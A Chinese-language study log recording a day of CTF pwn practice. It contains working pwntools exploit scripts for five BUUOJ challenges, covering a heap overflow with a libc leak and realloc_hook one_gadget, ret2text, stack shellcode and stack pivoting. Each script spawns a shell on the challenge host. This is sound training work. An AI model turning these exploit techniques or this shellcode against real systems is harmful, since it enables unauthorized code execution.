21 07 27学习总结

21.07.27学习总结

Column: July 27, 2021
Tags: learning experience

前言:

前几天在忙xctf和拆笔记本电脑, 除了自己撸出一道ctb外, 没什么其它实际产出(因为装内核一直失败), 所以就没怎么写博客

06:00-08:00: buu刷题, roarctf_2019_easy_pwn版本下错了…然后捣腾了两个小时, 学到了realloc_hook写onegadget的方法

16:00-16:30: buu刷题: wustctf2020_getshell_2: call和直接ret真实地址/plt表的区别: call压栈, ret不压栈

20:00-22:00: buu刷题: wustctf2020_closed: 输出重定向, exec(1>&0)

wustctf2020_getshell_2: ret2text

pwnable_start: 先泄露栈地址再执行shellcode

mrctf2020_easyoverflow: 绕过strcpy就行了

ciscn_2019_s_4: 写rop在栈上然后栈迁移

0ctf_2017_babyheap: 堆入门经典题

roarctf_2019_easy_pwn

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./roarctf_2019_easy_pwn')
elf=ELF('./roarctf_2019_easy_pwn')
context.log_level='debug'
context.binary=elf
libc=elf.libc
#libc=ELF('./libc-2.27.so')

def Create(size):
    sh.recv()
    sh.sendline('1')
    sh.recv()
    sh.sendline(str(size))

def Write(idx, size, content):
    sh.recv()
    sh.sendline('2')
    sh.recv()
    sh.sendline(str(idx))
    sh.recv()
    sh.sendline(str(size))
    sh.recv()
    sh.send(content)

def Drop(idx):
    sh.recv()
    sh.sendline('3')
    sh.recv()
    sh.sendline(str(idx))

def Show(idx):
    sh.recv()
    sh.sendline('4')
    sh.recv()
    sh.sendline(str(idx))

def stop():
    print str(proc.pidof(sh))
    pause()

def pwn():
    [Create(0xd0) for i in range(7)]
    [Create(0x68) for i in range(4)]
    for i in range(7):
        Drop(i)
    [Create(0x60) for i in range(7)]
    for i in range(7):
        Drop(i)
    payload='\0'*0x60+p64(0)+p8(0xe1)
    Write(7, 0x72, payload)
    Drop(8)
    Create(0x68)
    Show(9)
    sh.recvuntil('content: ')
    leak_libc=u64(sh.recv(8))
    libc_base=leak_libc-0x60-0x3ebc40
    log.success('libc_base: '+hex(libc_base))
    Create(0x68)
    Drop(0)
    Drop(1)
    payload2=p64(leak_libc-0x60-0x33)
    Write(9, 8, payload2)
    Create(0x60)
    Create(0x60)
    
    one_gadget=[0x4f3d5, 0x4f432, 0x10a41c ]
    payload3=p8(0)*(8+3)+p64(libc_base+one_gadget[2])+p64(libc_base+libc.sym['realloc']+10)
    Write(1, len(payload3), payload3)
    Create(10)
    sh.interactive()

pwn()

wustctf2020_getshell_2

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./wustctf2020_getshell_2')
sh=remote('node4.buuoj.cn', 29172)
elf=ELF('./wustctf2020_getshell_2')

pause()
payload='w'*28+p32(0x8048529)+p32(0x8048670)
sh.recv()
sh.send(payload)
sh.interactive()

pwnable_start

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./start')
sh=remote('node4.buuoj.cn',29382)
context.binary=ELF('./start')
#context.log_level='debug'
shellcode='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload='w'*20+p32(0x8048087)
#gdb.attach(sh, '''b *0x0804808F''')
sh.recvuntil(':')
sh.send(payload)
leak_stack=u32(sh.recv(4))
read_addr=leak_stack-4
payload='w'*20+p32(read_addr+24)+shellcode
sh.recv()
sh.send(payload)
sh.interactive()

mrctf2020_easyoverflow

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./mrctf2020_easyoverflow')
sh=remote('node4.buuoj.cn', 26361)
payload='w'*8*6+'n0t_r3@11y_f1@g'
sh.sendline(payload)
sh.interactive()

ciscn_2019_s_4

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_4')
sh=remote('node4.buuoj.cn',25390)
elf=ELF('./ciscn_s_4')
context.log_level='debug'
libc=ELF.libc

leave_ret=0x8048562
payload1='a'*40
sh.send(payload1)
sh.recvuntil('a'*40)
leak_stack=u32(sh.recv(4))
log.success('leak_stack: '+hex(leak_stack))
read_addr=leak_stack-0x38
log.success('read addr: '+hex(read_addr))
payload2='/bin/sh\x00'+p32(0x08048559)+p32(read_addr+8+8)+'/bin/sh\x00'*3+p32(read_addr+4)+p32(leave_ret)
pause()
sh.recv()
sh.send(payload2)
sh.interactive()